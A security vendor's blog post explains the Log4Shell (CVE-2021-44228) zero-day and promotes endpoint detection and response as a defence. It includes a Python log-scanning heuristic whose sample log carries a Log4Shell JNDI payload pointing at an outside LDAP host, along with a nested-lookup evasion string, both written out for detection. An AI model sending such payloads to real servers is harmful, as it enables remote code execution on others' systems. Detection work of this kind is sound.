Last week a vulnerability in Log4j was disclosed. This vulnerability, also referred to as CVE-2021-44228 or Log4Shell, is extremely dangerous because Log4j is used in internet-facing services and software, so attackers can exploit the vulnerability remotely. In Germany the authorities have already issued a code red warning for service outages due to this vulnerability.
0-day vulnerabilities and the associated risks
When the Log4Shell exploit code was made publicly available on Thursday last week, there was no patch available. This is what is called a 0-day vulnerability. Attacks on 0-day vulnerabilities are extremely dangerous for companies because they are unknown and can be very difficult to detect, making them a serious security risk. If attackers manage to exploit this vulnerability on one of your servers, they can potentially take full control of the system, which can give them access to sensitive data and passwords.
Over the past week a patch was released that fixes the Log4j vulnerability (Log4j version 2.15). Security teams have been installing it, where possible, on vulnerable systems over the last days. However, this is not always possible, it takes time to roll out, and by definition a patch always comes too late for a 0-day.
How can EDR help against Log4Shell and other future 0-days?
Organizations can prepare for these 0-day attacks by deploying an Endpoint Detection and Response (EDR) technology. EDR is your alarm system, which will detect ‘thieves sneaking in through a backdoor that was accidentally left unlocked.’
An EDR detects malicious activity and raises alarms, which trigger the security team to start an investigation. The team gains immediate visibility into a possible attack, even one that bypasses other defenses.
EDR also includes exploit mitigation technology that can prevent successful exploitation of the underlying operating system. An adversary is prevented from using common exploitation techniques because the execution of exploit code is stopped at the endpoint, in real time, which also blocks zero-day attacks that use previously undiscovered malware.
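As an added illustration of the kind of rule such an alarm can be built on (this is not Cegeka's code or any EDR product's logic), the following scans web-server log lines for Log4j lookup strings, which is how Log4Shell input reaches a vulnerable logger. The patterns, severities and sample log lines are my own and constructed for this example.

```python
"""Minimal Log4Shell detection heuristic over web-server log lines (example only)."""
import re
from typing import List, Optional, Tuple

# Direct JNDI lookup, the canonical CVE-2021-44228 trigger string.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A Log4j-style lookup nested inside another lookup. Normal request data
# almost never contains this syntax, so it is worth an alarm on its own.
NESTED_RE = re.compile(r"\$\{[^}]*\$\{")


def classify_line(line: str) -> Optional[str]:
    """Return a severity for a log line, or None if nothing suspicious is seen."""
    if JNDI_RE.search(line):
        return "high"
    if NESTED_RE.search(line):
        return "medium"
    return None


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, severity, offending line) for each hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        severity = classify_line(line)
        if severity:
            hits.append((number, severity, line.rstrip()))
    return hits


# Constructed sample: two benign requests, one direct lookup in the
# User-Agent header, and one nested lookup in the query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:01:05 +0000] "GET /api/v1/items HTTP/1.1" 200 2048 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:10:01:12 +0000] "GET /?q=${${env:NAME}:value} HTTP/1.1" 400 0 "-" "-"',
]

if __name__ == "__main__":
    for number, severity, line in scan_log_lines(SAMPLE_LOG):
        print(f"ALERT [{severity}] line {number}: {line}")
```

Running it reports lines 3 (high) and 4 (medium) and stays silent on the benign requests; a real EDR or SIEM rule would add the process and network context around the hit, but the trigger condition is the same idea.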
Peace of mind needed? Explore how Cegeka can help!
Cegeka Managed EDR services include the installation and the management of your EDR. The Cegeka Security Operations Center monitors the EDR alarms 24x7 and immediately takes the appropriate containment actions.
Our team of Security Advisors will help you decide on the most effective mitigation for your infrastructure.
If you are breached (or in danger of being breached), or if you would like more information on how to prepare for future 0-days, feel free to contact us directly.